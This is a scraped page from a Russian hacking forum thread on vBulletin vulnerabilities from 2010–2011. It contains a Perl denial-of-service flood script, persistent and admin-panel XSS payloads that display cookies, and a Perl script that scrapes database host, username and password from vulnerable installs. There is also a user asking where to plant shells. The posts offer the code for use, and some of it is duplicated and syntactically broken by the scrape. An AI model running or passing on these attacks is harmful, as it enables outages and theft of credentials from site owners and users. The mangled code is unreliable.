HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #91  
Старый 01.10.2010, 10:28
RAISh
Новичок
Регистрация: 30.04.2010
Сообщений: 8
С нами: 8438441

Репутация: 0
По умолчанию

и то не все сообщения

Т.к. при отправке через страницу профиля, сообщение будет только тому отправлятся, с чьего профиля отсылают

А если в строке ник нейма будут вводить ник, то появится оригинальный и ложный, которым ты создал, и если он выберет твой ложный ник, то придёт тебе сообщения, а так ники в списке одинаковые.
 
Ответить с цитированием

  #92  
Старый 01.10.2010, 13:05
himmi
Новичок
Регистрация: 29.06.2010
Сообщений: 11
С нами: 8353046

Репутация: 0
По умолчанию

Цитата:
Сообщение от RAISh  
и то не все сообщения
Т.к. при отправке через страницу профиля, сообщение будет только тому отправлятся, с чьего профиля отсылают
А если в строке ник нейма будут вводить ник, то появится оригинальный и ложный, которым ты создал, и если он выберет твой ложный ник, то придёт тебе сообщения, а так ники в списке одинаковые.
к нику присваивается id?
 
Ответить с цитированием

  #93  
Старый 11.10.2010, 10:44
GrandMaster
Постоянный
Регистрация: 16.05.2009
Сообщений: 309
С нами: 8940779

Репутация: 112
По умолчанию

Цитата:
Сообщение от farent12  
Ребят, помогите, есть шеллы под этот форум, кто-что посоветует как быстро код вставить и куда?
/thread220278.html
 
Ответить с цитированием

  #94  
Старый 03.12.2010, 15:17
SSSetuPPP
Познающий
Регистрация: 22.01.2007
Сообщений: 32
С нами: 10158236

Репутация: 0
По умолчанию

[QUOTE="ph1l1ster"]
vBulletin® Version 3.8.2 Denial of Service Exploit

Код:
#!usr/bin/perl
#vBulletin® Version 3.8.2 Denial of Service Exploit
#ea$y Laster
########################################################################
# Modules                                                              #
########################################################################
use IO::SOCKET;           # Object interface                           #
########################################################################
if (@ARGVvBulletin® Version 3.8.2);
     chomp($ziel =);
     if ($ziel eq""){
     die "$fehler\a\n";}
     print"$block\n";
       print"$block\n";
       print q(Path->);
       chomp($path =);
       if ($path eq "") {
       die "$fehler !\a\n";}
       print"$block\n";
          print"$block\n";
          print "Verwundbarkeit\n";
          print"forumdisplay.php?f=\n";
          print"->"n;
            chomp($vul =);
            if ($vul eq "") {
            die "$fehler !\a\n";}
            print"$block\n";
               print"$block\n";
               print q(Time->);
               chomp($flood =);
               if ($flood eq "") {
               die "$fehler !\a\n";}
                  print"$block\n";
                  print"$block\n";
                  print q(Port->);
                  chomp($port =);
                  if ($port eq ""){
                  die "$fehler \n";}
                  print"$block\n";
                     print q(Send "start"->);
                     chomp($start =);
                     if ($start eq "") {
                     die "$fehler\n";}
print "$block\a\n";
print "[+]Konntroliere Daten \n";
print "[*]Kontroliere Ziel   : $ziel\n";
print "[*]Kontroliere Board  : $path\n";
print "[*]Kontroliere Port   : $port\n";
print "$block\n";
if($start == 1){
while($x != 0000){
$x++;}
}elsif ($start == start){
while($x != $flood)
{
$postit = "$ziel"."$path"."$vul";
$lrg = length $postit;
$sock = new IO::Socket::INET (
                               PeerAddr => "$ziel",
                               PeerPort => "$port",
                               Proto => "tcp",
                              );

print $sock "POST $path$vul HTTP/1.1\n";
print $sock "Host: $ziel\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Referer: $ziel\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20070421 Firefox/2.0.0\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);
syswrite STDOUT, "->BLACKOUTvBulletin® Version 3.8.2);
     chomp($ziel =);
     if ($ziel eq""){
     die "$fehler\a\n";}
     print"$block\n";
       print"$block\n";
       print q(Path->);
       chomp($path =);
       if ($path eq "") {
       die "$fehler !\a\n";}
       print"$block\n";
          print"$block\n";
          print "Verwundbarkeit\n";
          print"forumdisplay.php?f=\n";
          print"->"n;
            chomp($vul =);
            if ($vul eq "") {
            die "$fehler !\a\n";}
            print"$block\n";
               print"$block\n";
               print q(Time->);
               chomp($flood =);
               if ($flood eq "") {
               die "$fehler !\a\n";}
                  print"$block\n";
                  print"$block\n";
                  print q(Port->);
                  chomp($port =);
                  if ($port eq ""){
                  die "$fehler \n";}
                  print"$block\n";
                     print q(Send "start"->);
                     chomp($start =);
                     if ($start eq "") {
                     die "$fehler\n";}
print "$block\a\n";
print "[+]Konntroliere Daten \n";
print "[*]Kontroliere Ziel   : $ziel\n";
print "[*]Kontroliere Board  : $path\n";
print "[*]Kontroliere Port   : $port\n";
print "$block\n";
if($start == 1){
while($x != 0000){
$x++;}
}elsif ($start == start){
while($x != $flood)
{
$postit = "$ziel"."$path"."$vul";
$lrg = length $postit;
$sock = new IO::Socket::INET (
                               PeerAddr => "$ziel",
                               PeerPort => "$port",
                               Proto => "tcp",
                              );

print $sock "POST $path$vul HTTP/1.1\n";
print $sock "Host: $ziel\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Referer: $ziel\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20070421 Firefox/2.0.0\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);
syswrite STDOUT, "->BLACKOUT"n;
Может надо так?

Код:
print"->n";
p.s. кавычку не туда поставил...
 
Ответить с цитированием

  #95  
Старый 04.12.2010, 22:04
[Ozzi]
Новичок
Регистрация: 26.11.2010
Сообщений: 16
С нами: 8137046

Репутация: -1
По умолчанию

vBulletin 4.0.8 - Persistent XSS via Profile

vBulletin - Persistent Cross Site Scripting via Profile​


Versions Affected: 4.0.8 (3.8.* is not vulnerable.)

vBulletin is prone to a Persistent Cross Site Scripting vulnerability within the

Profile Customization feature. If this feature is not enabled the vulnerability

does not exist and the installation of vBulletin is thereby secure.

Within the profile customization fields, it is possible to enter colour codes,

rgb codes and even images. The image url() function does not sanitize user

input in a sufficient way causing vBulletin to be vulnerable to XSS attacks.

[1] Private Reflected XSS:

An attacker can inject scripts in a simple way, which is only visible to the attacker.

Proof of Concept:

url()

(This is only visible to the attacker when he or she is logged in, and browsing his or her own profile.)

[2] Global Reflected XSS:

An attacker can inject malicious CSS data executing javascript, which is then visible

to anyone browsing the user profile. Even guests visiting the malicious user profile.

Proof of Concept: (IE6 only, may not work in IE7+ and FF)



url(/);background:url(javascript:document.write(1337))

url(/);width:expression(alert('www.intern0t.net'))


Please note that some of these strings may be too long to be injected. However a

blog entry at Exploit-DB and a video on YouTube will be released very soon.

-:: Solution ::-

Turn off profile customization immediately for users able to customize their profile!

When a security patch has been provided by the vendor, enable this feature again.

Взято с www.exploit-db.com/exploits/15550/
 
Ответить с цитированием

  #96  
Старый 10.12.2010, 00:47
A_n_d_r_e_i
Участник форума
Регистрация: 02.09.2009
Сообщений: 286
С нами: 8784803

Репутация: 257
По умолчанию

vBulletin Version 3.8.4 AdminCP

Стили и шаблоны-Сохранить/загрузить стили

загружаем стиль, в поле "Название для загруженного стиля"пишем

alert (document.cookie);

когда выберем на форуме последний загруженный стиль - увидим алерт и свои куки, так же как и в админке

Языки и фразы-Сохранить/загрузить языки

В поле "Название загружаемого языка" пишем alert (document.cookie);

"Перезаписать язык" выбираем "Создать новый"

выбираем файл языка, загружаем

идём по адресу http://ваш_форум и видим свои куки, алерт

Разделы и модераторы-Добавить раздел

в поля "Заголовок" и "Описание" пишем alert (document.cookie);

нажимаем "Сохранить"

Видим два алерта на главной, и один в админке по адресу Разделы и модераторы-Управление разделами(последний выполнился у меня в ие, в опере не было)

Основные настройки-Основные настройки, Название сайта / Ссылка / Контактная информация

в поле "Текст авторских прав" пишем alert (document.cookie);

нажимаем сохранить

на главной видим алерт

Объявления-Создать новое объявление

Раздел (будет добавлено и в подразделы) оставляем по-дефолту(Во всех разделах)

в поле "Заголовок" и поле "Текст" вбиваем alert (document.cookie);

нажимаем "Сохранить"

Заходим в любой раздел и видим алерт

Дополнительные поля профиля-Добавить дополнительное поле профиля

Тип поля профиля-Текстовое поле одной строкой, нажимаем "Продолжить"

в поле "Заголовок", "Значение по умолчанию" и "Описание" вставляем alert (document.cookie);

Какая страница отображает эту опцию? выбираем то, что вам подходит. я же выбрал "Редактировать данные"

Нажимаем "Сохранить"

по линку http://ваш_форум/profile.php?do=editprofile видим два алерта
 
Ответить с цитированием

  #97  
Старый 13.02.2011, 18:32
foozzi
Новичок
Регистрация: 13.04.2010
Сообщений: 0
С нами: 8462565

Репутация: 0
По умолчанию

vBulletin 3.8.6 Exploit

Код:
#!/usr/bin/perl
use strict;
use LWP::Simple;
use HTML::Parser;
use Data::Dumper;
my $url = shift @ARGV;
my $line;
die "No URL specified on command line." unless (defined $url);
my $url2 = "$url\/install\/vbulletin-language.xml";
my $content = get($url2); #put site html in $content.
die "get failed" if (!defined $content);

if ($content =~ m/database_ingo/) {
    $url2 = "$url\/faq.php\?s=\&do=search\&q=data\&match=all\&titlesonly=0";
    $content = get($url2);
    die "Get Failed" if (!defined $content);
    open(MYDATA, ">aaaaa.txt");
    print MYDATA $content;
    close MYDATA;
    open(NEDATA, ") {
            if ($line =~ m/Host:/) {
                $line =~ s/Database\//;
                $line =~ s/\//;
                print "$line\n";
            }
            if ($line =~ m/Username:/) {
                $line =~ s/Database//;
                $line =~ s///;
                print "$line\n";
            }
            if ($line =~ m/Password:/) {
                $line =~ s/Database//;
                $line =~ s///;
                print "$line\n";
            }
        }
    close NEDATA;
    unlink($url2);
} else {
print "Not vulnerable!\n";
};
_____________________________________________

How to use?

my $content = get($url2)

my $content = get('http://wowcewebsite.com/path/')

_____________________________________________*
 
Ответить с цитированием

  #98  
Старый 17.02.2011, 20:50
foozzi
Новичок
Регистрация: 13.04.2010
Сообщений: 0
С нами: 8462565

Репутация: 0
По умолчанию

Цитата:
Сообщение от NeW  
Какаие есть уязвимости в 3.8.2, кроме DoS'а?
_http://www.exploit-db.com/shellcode/ сложно ведь правда поискать?
 
Ответить с цитированием

  #99  
Старый 22.02.2011, 00:27
Slay90
Участник форума
Регистрация: 12.04.2009
Сообщений: 129
С нами: 8990166

Репутация: 14
По умолчанию

foozi не пашет

No URL specified on command line. at C:\perl\1.pl line 8.
 
Ответить с цитированием

  #100  
Старый 27.02.2011, 04:55
Mr.Br0wn
Новичок
Регистрация: 26.10.2009
Сообщений: 17
С нами: 8706185

Репутация: 27
По умолчанию

Slay90, поправь ошибку в 8-й строке скрипта
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
В ядре Linux появляется все больше уязвимостей dinar_007 Мировые новости. Обсуждения. 18 26.01.2007 16:21



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...